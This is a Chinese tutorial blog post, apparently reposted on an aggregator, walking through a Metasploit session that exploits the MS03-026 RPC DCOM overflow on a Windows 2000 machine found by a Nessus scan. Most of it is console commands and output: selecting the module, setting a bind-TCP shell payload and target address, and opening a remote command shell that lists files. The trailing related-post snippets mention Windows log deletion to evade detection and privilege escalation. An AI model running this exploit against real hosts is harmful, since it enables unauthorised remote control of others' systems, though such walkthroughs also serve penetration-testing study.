2. 程式人生 > >利用msfconsole滲透攻擊windows 2000

利用msfconsole滲透攻擊windows 2000

阿新 發佈:2019-01-12

1.利用Nessus掃描該windows 2000的機器,發現有些高危的漏洞

比如:MS03-026 / MS03-039: Buffer Overrun In RPCSS Service Could Allow Code Execution (823980 / 824146)

然後開啟msfconsole

msf > search ms03-026

Matching Modules
================

   Name                                  Disclosure Date  Rank   Check  Description
   ----                                  ---------------  ----   -----  -----------
   exploit/windows/dcerpc/ms03_026_dcom  2003-07-16       great  No     MS03-026 Microsoft RPC DCOM Interface Overflow


msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(windows/dcerpc/ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(windows/dcerpc/ms03_026_dcom) > show payloads
msf exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 10.26.33.111
RHOST => 10.26.33.111
msf exploit(windows/dcerpc/ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.26.33.111     yes       The target address
   RPORT  135              yes       The target port (TCP)


Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.26.33.111     no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(windows/dcerpc/ms03_026_dcom) > run

[*] 10.26.33.111:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 10.26.33.111:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:
 
[email protected]_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Sending exploit ...
[*] Started bind TCP handler against 10.26.33.111:4444
[*] Command shell session 1 opened (10.26.30.41:36675 -> 10.26.33.111:4444) at 2018-12-11 19:33:33 +0800



C:\WINNT\system32>d:    
d:

D:\>dir
dir
   ZRMPSEL_CN
  EAB5-D65E

 D:\ ¼

2003-06-26  20:00                   45 AUTORUN.INF
2003-06-26  20:00       <DIR>          BOOTDISK
2003-06-26  20:00              304,624 BOOTFONT.BIN
2003-06-26  20:00                    0 CDROMSP4.TST
2003-06-26  20:00                    5 CDROM_IP.5
2003-06-26  20:00                    5 CDROM_NT.5
2003-06-26  20:00       <DIR>          DISCOVER
2003-06-26  20:00       <DIR>          I386
2003-06-26  20:00               12,354 READ1ST.TXT
2003-06-26  20:00              465,408 README.DOC
2003-06-26  20:00              358,160 SETUP.EXE
2003-06-26  20:00       <DIR>          SETUPTXT
2003-06-26  20:00               18,173 SPNOTES.HTM
2003-06-26  20:00       <DIR>          SUPPORT
2003-06-26  20:00       <DIR>          VALUEADD
               9     1,158,774 

               6 ¼              0

 

相關推薦

利用msfconsole滲透攻擊windows 2000

1.利用Nessus掃描該windows 2000的機器,發現有些高危的漏洞 比如:MS03-026 / MS03-039: Buffer Overrun In RPCSS Service Could Allow Code Execution (823980 / 824146) 然後開啟ms

metasploit利用漏洞滲透攻擊靶機

用戶 需要 用戶密碼 進入 按鍵 方便 之前 1-43 gin 1、網絡測試環境構建 首先需要先配置好一個滲透測試用的網絡環境,包括如圖1所示的運行Kali Linux系統的計算機,如圖2所示的老師給的Windows Server 2000系統的計算機。這兩臺計算機處於同一

windows滲透攻擊

---恢復內容開始--- 從開啟的meterpreter shell 開啟 cmd  在cmd中執行wmic就可以得到系統相關資訊   win10一些提權操作我都失敗了 在win7中一下是我成功提權使用的模組 exploit/windows/local/bypassuac 20

滲透技巧——Windows日誌的刪除與繞過

獲取 hashtable ica 保護 master dll 程序 proc 篩選 0x00 前言 在滲透測試過程中,Windows日誌往往會記錄系統上的敏感操作,如添加用戶,遠程登錄執行等。 對於一次完整的滲透測試,通常會選擇對Windows日誌進行清除和繞過,而對於防

利用Pastezort滲透win7

roo 文字 session git clone images 技術分享 windows 粘貼 color 下載Pastezort git clone https://github.com/ZettaHack/PasteZort.git 給Pastezort文件

完成sqlmap滲透攻擊入門到實戰專欄文章初步目標

sqlmap滲透攻擊《滲透攻擊入門到實戰》專欄文章http://blog.51cto.com/cloumn/detail/3從推出到目前基本預訂目標17章內容完成更新。回顧整個過程有以下一些感受:1.技術的東西必須深入,目前安全圈安全生態不是特別好,很多內容都是copy,筆者在對某些內容進行查看時,根據文章提

【重大好消息】51CTO博客滲透攻擊專欄的陳小兵老師開直播啦~

博客專欄 專欄直播 直播課 【重大好消息】51CTO博客滲透攻擊專欄的陳小兵老師開直播啦~ 直播主題:SQLmap數據庫脫褲攻擊與防範 直播時間:2018年5月28日20:30-10:30 直播形式:(QQ群:430231379)群直播 點擊鏈接加入群聊【51CTO博客滲透專欄直播】

利用Syslog Watcher在windows下部署syslog日誌服務器

data -c div ica gdi onexit 軟件 可靠 lis 1.概述 syslog協議是各種網絡設備、服務器支持的網絡日誌記錄標準。Syslog消息提供有關網絡事件和錯誤的信息。系統管理員使用Syslog進行網絡管理和安全審核。 通過專用的syslog服務器和

在C#中,我們可以利用以下方法判斷Windows服務是否存在

  在C#中,我們可以利用以下方法判斷Windows服務是否存在          private bool IsServiceExisted(string se

metasploit滲透攻擊例項

先說一下幾個命令的作用: 1.search xxx        檢視可以攻擊的模組  2.show options       檢視有哪些配置是需要我們自己去設定的(yes是必須設定的) 3.set rhosts     設定IP 4.set user_file  設定使用者賬號字典,後面

滲透攻擊

許可權提升 許可權提升簡稱<提權>,是一種通過各種辦法和漏洞,提高自己在伺服器中的許可權,以便控制全部資源的方法。比如在Windows中就是獲得System的許可權,在Linux就是獲得root的許可權 一般提權的方法有 系統漏洞提權 資料庫提權

利用純c++和windows api實現gb2312和utf-8兩種編碼格式的轉換

為什麼同樣的字串在兩臺主機上,會出現一個顯示正常,一個顯示亂碼的情況呢? 答案:編碼方式不匹配。 解釋:任何內容在計算機中的儲存形式都是二進位制,不論是在記憶體中還是在硬碟中。所以,同一個字串在兩臺主機上的二進位制儲存是一模一樣的。只是將這個二進位制資料呈現時,發生了變化。呈現字串的過程就是

利用Syslog Watcher在windows下部署syslog日誌伺服器

1.概述 syslog協議是各種網路裝置、伺服器支援的網路日誌記錄標準。Syslog訊息提供有關網路事件和錯誤的資訊。系統管理員使用Syslog進行網路管理和安全稽核。 通過專用的syslog伺服器和syslog協議將來自整個網路的事件記錄整合到一箇中央儲存庫中,對於網路安全具有重大意義,syslog日誌伺服

metasploit---滲透攻擊基礎

開啟msfconsole [email protected]:~# msfconsole 當你想要查詢某個特定的滲透攻擊、輔助或攻擊載荷模組時,使用search命令 msf > search ms08-067 找到攻擊模組後,可以使用use

如何利用mono把.net windows service程式遷移到linux上

寫在最前:之所以用要把windows程式遷移到Linux上,主要是由於一些成本問題,這個就不多解釋了。 如何把之前用.net寫的windows服務程式遷移到linux上執行。答案是有很多種的,今天我只提一下mono(我只實驗了mono,呵呵)。 如何在Linux部署mono,併成功的執行.net程

Meterpreter使用總結(2)之後滲透攻擊模組

meterpreter雖然功能強大,作為單一的工具還是會有他功能的侷限性,因此在metasploit4.0之後引入了後滲透攻擊模組,通過在meterpreter中使用ruby編寫的模組來進行進一步的滲

Windows 2000 使用者許可權和特權配置

本模組內容 本模組含有一張介紹 Microsoft® Windows 2000® 作業系統上的預設使用者許可權指派的表,並提供一張模組 Windows 2000 安全配置中建議的更改列表。 返回頁首 目標 使用本模組可以實現: • 瞭解 Windows 2000 系統上的預

Windows 2000 檢測系統安全清單

win2000安裝好以後,系統會建立一些隱藏的共享,你可以在cmd下打 net share 檢視他們。網上有很多關於IPC入侵的文章,相信大家一定對它不陌生。要禁止這些共享 ,開啟 管理工具>計算機管理>共享資料夾>共享在相應的共享資料夾上按右鍵,點停止共享即可,不過機器重新啟動後,這些共享

經驗之談:當Windows 2000不能啟動時

作者:senlin 來源:cfanclub  這個是第一個要問客戶或自己的問題,比如:是否安裝了新的驅動程式、系統補丁或新硬體,通常我會得到一些非常有用的資訊,因為以上操作經常是引起系統不能啟動的元凶。  透過現象看本質  Windows 2000不能啟動會有不同的表現  1

開發Windows 2000/XP下的防火牆-IPFilter技術介紹

開發Windows 2000/XP下的防火牆 作者:Jesús O 翻譯:PowerCPP 下載本文配套原始碼 介紹 如果你決定開發LINUX下的防火牆,你會找到很多免費的資訊與原始碼。但如果開發WINDOWS平臺下的防火牆會有點困難,找到相關資訊與程式碼都簡直是不可能的任務。 因此我決定寫這篇文章介紹在W